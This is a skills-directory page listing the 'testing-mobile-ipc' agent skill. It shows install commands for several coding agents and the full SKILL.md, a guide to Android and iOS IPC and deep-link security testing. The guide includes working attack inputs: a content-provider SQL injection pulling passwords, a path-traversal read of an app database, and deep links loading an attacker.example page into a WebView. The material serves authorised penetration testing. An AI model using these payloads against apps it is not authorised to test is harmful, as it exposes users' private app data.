Re Mobile Pack
dslsdzc/rev-skills
Android 加固脱壳专项:乐固/360/梆梆/爱加密、DEX 恢复. An agent skill from dslsdzc/rev-skills.
Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links…
$ npx skills add trilwu/secskills --skill testing-mobile-ipc -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install trilwu/secskills testing-mobile-ipc --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/secskills-offense/skills/testing-mobile-ipc .claude/skills/testing-mobile-ipc && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "testing-mobile-ipc" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/testing-mobile-ipc into .claude/skills/testing-mobile-ipc/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "testing-mobile-ipc", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/testing-mobile-ipcType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add trilwu/secskills --skill testing-mobile-ipc -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install trilwu/secskills testing-mobile-ipc --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .agents/skills && cp -r skills-src/secskills-offense/skills/testing-mobile-ipc .agents/skills/testing-mobile-ipc && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "testing-mobile-ipc" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/testing-mobile-ipc into .agents/skills/testing-mobile-ipc/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "testing-mobile-ipc", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add trilwu/secskills --skill testing-mobile-ipc -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install trilwu/secskills testing-mobile-ipc --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/secskills-offense/skills/testing-mobile-ipc .cursor/skills/testing-mobile-ipc && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "testing-mobile-ipc" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/testing-mobile-ipc into .cursor/skills/testing-mobile-ipc/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "testing-mobile-ipc", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/trilwu/secskills.git --path secskills-offense/skills/testing-mobile-ipc--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add trilwu/secskills --skill testing-mobile-ipc -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install trilwu/secskills testing-mobile-ipc --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/secskills-offense/skills/testing-mobile-ipc .gemini/skills/testing-mobile-ipc && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "testing-mobile-ipc" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/testing-mobile-ipc into .gemini/skills/testing-mobile-ipc/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "testing-mobile-ipc", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install trilwu/secskills testing-mobile-ipcInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add trilwu/secskills --skill testing-mobile-ipc -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .github/skills && cp -r skills-src/secskills-offense/skills/testing-mobile-ipc .github/skills/testing-mobile-ipc && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "testing-mobile-ipc" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/testing-mobile-ipc into .github/skills/testing-mobile-ipc/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "testing-mobile-ipc", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add trilwu/secskills --skill testing-mobile-ipc -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install trilwu/secskills testing-mobile-ipc --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/trilwu/secskills.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/secskills-offense/skills/testing-mobile-ipc .opencode/skills/testing-mobile-ipc && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "testing-mobile-ipc" agent skill from https://github.com/trilwu/secskills/tree/main/secskills-offense/skills/testing-mobile-ipc into .opencode/skills/testing-mobile-ipc/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "testing-mobile-ipc", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
testing-mobile-ipcTest mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links…
Testing Mobile Ipc is an agent skill from trilwu/secskills. Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links verification, iOS custom URL schemes, Universal Links, and App Groups — using drozer, adb, and Frida. Use when reviewing AndroidManifest.xml exported components, testing deeplinks or URL schemes, or assessing what another app on the device can reach.
Its SKILL.md is about 2.2k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Mobile, covering Mobile application security, Threat modeling and Mobile testing and debugging. It works with Android, iOS and Frida. The repository describes itself as: Transform Claude Code into your personal security engineer. The licence is MIT.
5 steps, taken from the first numbered list in SKILL.md.
Read from SKILL.md and the folder at commit ca53957. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
adbrgcurljqxcrunFrom the folder's file list and the shell code blocks in SKILL.md.
No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.
From URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Testing Mobile Ipc loads about 2.2k tokens when it runs. Until then it costs about 117 tokens; SKILL.md has 790 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from trilwu/secskills at commit ca53957, republished under its MIT licence (© trilwu). 790 words, ~2,209 tokens.
.claude/skills/testing-mobile-ipc/SKILL.md (or your agent's skills folder).Every exported component and registered URL scheme is a remote entry point that does not need the network. A malicious app on the same device — or a web page the user visits — can invoke them directly, and they are frequently written as if only the app itself would ever call them.
AndroidManifest.xml for exported componentsPendingIntent, intent redirection, and App Group sharingtesting-apisanalyzing-ios-binaries or the relevant
reversing-* skillbypassing-mobile-pinning
or bypassing-root-jailbreak-detection firsttesting-mobile-applicationsapktool d target.apk -o out
# Every component with exported=true, or with an intent-filter and no explicit
# exported attribute on older targetSdk (which defaults to exported)
rg -n 'android:exported="true"|<intent-filter>' -B3 out/AndroidManifest.xml
# Live enumeration
adb shell dumpsys package com.target.app | rg -A3 'Activity Resolver|Receiver Resolver|Service Resolver|Provider'
drozer console connect
# run app.package.attacksurface com.target.app
# run app.activity.info -a com.target.app
# run app.provider.info -a com.target.appandroid:exported defaults changed — apps targeting API 31+ must declare
it explicitly, but a component with an intent-filter on an older target is
exported implicitly. Check targetSdkVersion before concluding a component is
private.
Also check permission protection levels. A component "protected" by a
custom permission declared with protectionLevel="normal" is protected by
nothing: any app can request and receive it without user interaction.
rg -n 'permission android:name|protectionLevel' out/AndroidManifest.xml# Activities — can an unauthenticated screen be launched directly?
adb shell am start -n com.target.app/.SomeActivity
adb shell am start -a android.intent.action.VIEW -d "myapp://path?param=value"
adb shell am start -n com.target.app/.WebActivity --es url "https://attacker.example"
# Services
adb shell am startservice -n com.target.app/.ExportedService --es cmd value
# Broadcast receivers
adb shell am broadcast -a com.target.app.ACTION_X --es data value
# Content providers — the highest-yield target
adb shell content query --uri content://com.target.app.provider/users
adb shell content query --uri content://com.target.app.provider/users \
--where "1=1) UNION SELECT password FROM creds--"
adb shell content read --uri content://com.target.app.provider/files/../../databases/app.dbContent providers deserve specific attention because two classic bugs recur:
selection/projection arguments, which are
concatenated into the query far more often than in server code.openFile(), where a provider that serves files from
its own directory does not canonicalize the requested path, giving any app on
the device read access to the app's private storage.Intent redirection (the "confused deputy" of Android). An exported
component takes an Intent as an extra and then starts it. The caller
supplies the inner intent, so it executes with the victim app's identity —
reaching its non-exported components and its permissions.
rg -n 'getParcelableExtra.*Intent|startActivity\(.*getIntent\(\).*Extra' out/smali*
# Exploit shape: outer intent → exported component → inner intent → private componentPendingIntent hijacking. A PendingIntent created with an implicit base
intent, or without FLAG_IMMUTABLE, lets the receiving app fill in the blanks
and cause an action with the sender's identity.
rg -n 'PendingIntent.get(Activity|Broadcast|Service)' -A3 out/smali*
# Findings: FLAG_MUTABLE (or no flag pre-API-31) plus an implicit base intentDeep link to WebView. A deep link parameter that becomes a loadUrl()
target turns any web page into a way to render attacker content inside the
app's WebView — with its cookies, its JS bridges, and its file access.
adb shell am start -a android.intent.action.VIEW -d "myapp://open?url=https://attacker.example"
rg -n 'loadUrl|addJavascriptInterface|setAllowFileAccess|setJavaScriptEnabled' out/smali*App Links verification. autoVerify="true" only works if
https://domain/.well-known/assetlinks.json is correct and reachable. When
verification fails, the link degrades to a disambiguation dialog that another
app can also claim.
curl -s https://target.example/.well-known/assetlinks.json | jq .
adb shell pm get-app-links com.target.app# Declared URL schemes and associated domains
plutil -p Payload/TargetApp.app/Info.plist | rg -A5 'CFBundleURLSchemes'
codesign -d --entitlements :- Payload/TargetApp.app | rg -A3 'associated-domains|application-groups'
# Trigger a scheme
xcrun simctl openurl booted "myapp://path?param=value"
# On device: open the URL from Safari or NotesCustom URL schemes are unauthenticated and claimable. Any app can register
myapp://, and if two do, the winner is undefined. Anything reached through a
custom scheme must be treated as attacker-invoked. Universal Links are the
verified alternative:
curl -s https://target.example/.well-known/apple-app-site-association | jq .
# Must be served over HTTPS, no redirect, correct app ID, correct pathsAlso check:
application:openURL:options: — check whether the handler validates the
source application and the URL's parameters before acting.Invoking a component is not itself a finding. The finding is what it lets an unprivileged local app do:
Test whether the deep link path skips authentication specifically: launch the target component with the app logged out, and again with a different account.
normal is granted automatically.targetSdkVersion, and check whether
intent redirection reaches it anyway.testing-mobile-applications — the wider assessmenttesting-apis — the backend those components ultimately callanalyzing-ios-binaries — entitlements and App Group enumerationreporting-security-findings — severity for local-attacker findings© trilwu, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in secskills-offense/skills/testing-mobile-ipc of trilwu/secskills.
Open the folder on GitHubat commit ca53957
Testing Mobile Ipc next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Testing Mobile Ipc this skilltrilwu/secskills | 157 | — | ~2.2k | Automated safety check: Pass | MIT | |
| Re Mobile Packdslsdzc/rev-skills | 130 | — | ~2k | Automated safety check: Pass | Apache-2.0 | |
| Mobile Securitytransilienceai/communitytools | 562 | — | ~2.5k | Automated safety check: Pass | MIT | |
| Mobile App Security Testinglangbyyi/CyberStrikeAI-SRC | 135 | — | ~12k | Automated safety check: Pass | Apache-2.0 | |
| Frida Mobile Securityindex-login/MobileRE-Skill | 144 | — | ~3k | Automated safety check: Pass | MIT | |
| Mira Risk Collectvw2x/Mira | 105 | — | ~793 | Automated safety check: Pass | GPL-3.0 |
dslsdzc/rev-skills
Android 加固脱壳专项:乐固/360/梆梆/爱加密、DEX 恢复. An agent skill from dslsdzc/rev-skills.
transilienceai/communitytools
Mobile application security testing (Android + iOS) mapped to OWASP MASVS/MASTG — static reversing (Flutter AOT, Unity IL2CPP, React Native/Hermes, native ARM64, Mach-O/Swift), SAST (manifest/IPC…
langbyyi/CyberStrikeAI-SRC
移动应用安全深度测试专业技能(v3.0):移动端深层攻击链(App→API→后端→云)、Android/iOS深度逆向与动态调试、Frida全面对抗与加固脱壳、iOS越狱检测绕过/ObjC Runtime/LLDB调试/证书固定绕过、跨平台框架漏洞(Flutter/React…
index-login/MobileRE-Skill
用于 Android/iOS 移动应用安全逆向分析:Frida 动态插桩、绕过反调试/反注入/加固壳、脱壳、加密与 native SO 层 hook、运行时行为分析、jadx-mcp 静态攻击面分析、离线 SO 静态分析(ELF 侦察/字符串/交叉引用/反汇编/JNI 判型)。用户提到"绕过检测/闪退/脱壳/加密/抓包/行为摸底/内存扫描/分析 so/ELF…
vw2x/Mira
Run Mira environment risk collection. An agent skill from vw2x/Mira.
manyuegong33/r0crawl_skills
面向新手的全谱系逆向工程路由器,覆盖 Web/JavaScript、Android/iOS、Frida、脱壳、反分析、原生二进制、协议、固件、恶意软件、游戏、云 API、CTF、可复现一致性测试。用于逆向、起步、脱壳、反编译、hook、Frida、绕过检测、APK/SO/DEX/JS/PCAP/WASM/PE/ELF/Mach-O 分析、签名还原,或从样本到验证结果的完整调查。
trilwu/secskills
Audit source code for exploitable vulnerabilities using threat-model-driven review, taint tracing, invariant checking, and variant analysis.
trilwu/secskills
Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access.
trilwu/secskills
Assess and harden LLM applications and agentic systems against prompt injection, tool misuse, excessive agency, memory poisoning, RAG data leakage, and model supply-chain risk, mapped to the OWASP…
trilwu/secskills
Reverse engineer compiled binaries, firmware, and mobile app packages using triage, static disassembly, decompilation, and dynamic instrumentation.
trilwu/secskills
Reverse engineer Go binaries by recovering function names and types from pclntab and moduledata using GoReSym, redress, and IDA/Ghidra Go plugins, and by reading Go's non-standard calling…
trilwu/secskills
Analyze iOS applications at the binary level — decrypting FairPlay-protected IPAs with frida-ios-dump or bagbak, inspecting Mach-O load commands, recovering Objective-C headers with class-dump, and…
Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links…. Testing Mobile Ipc is an agent skill from trilwu/secskills. Test mobile inter-process communication and deep link attack surface — exported Android activities, services, receivers and content providers, intent redirection, PendingIntent hijacking, App Links verification, iOS custom URL schemes, Universal Links, and App Groups — using drozer, adb, and Frida.
Testing Mobile Ipc fits situations like: reviewing AndroidManifest.xml exported components; testing deeplinks; assessing what another app on the device can reach.
Run `npx skills add trilwu/secskills --skill testing-mobile-ipc -a claude-code`. Or copy the skill folder (secskills-offense/skills/testing-mobile-ipc in trilwu/secskills) into .claude/skills/testing-mobile-ipc in your project. Claude Code loads it when a task matches its description.
Run `npx skills add trilwu/secskills --skill testing-mobile-ipc -a codex`. Or copy the skill folder (secskills-offense/skills/testing-mobile-ipc in trilwu/secskills) into .agents/skills/testing-mobile-ipc in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add trilwu/secskills --skill testing-mobile-ipc -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/testing-mobile-ipc, .gemini/skills/testing-mobile-ipc, .github/skills/testing-mobile-ipc and .opencode/skills/testing-mobile-ipc in your project.
Going by SKILL.md and its folder, Testing Mobile Ipc needs the command-line tools its instructions call (adb, rg, curl, jq and xcrun).
SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Testing Mobile Ipc is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 2.2k tokens (SKILL.md is roughly 8.8k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Testing Mobile Ipc: Re Mobile Pack (dslsdzc/rev-skills, 130 stars), Mobile Security (transilienceai/communitytools, 562 stars), Mobile App Security Testing (langbyyi/CyberStrikeAI-SRC, 135 stars) and Frida Mobile Security (index-login/MobileRE-Skill, 144 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
trilwu (a GitHub user) maintains it in trilwu/secskills, which has 157 GitHub stars. The repository holds 50 skills in this directory. The repository was last updated on September 4, 2026.
Source: trilwu/secskills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.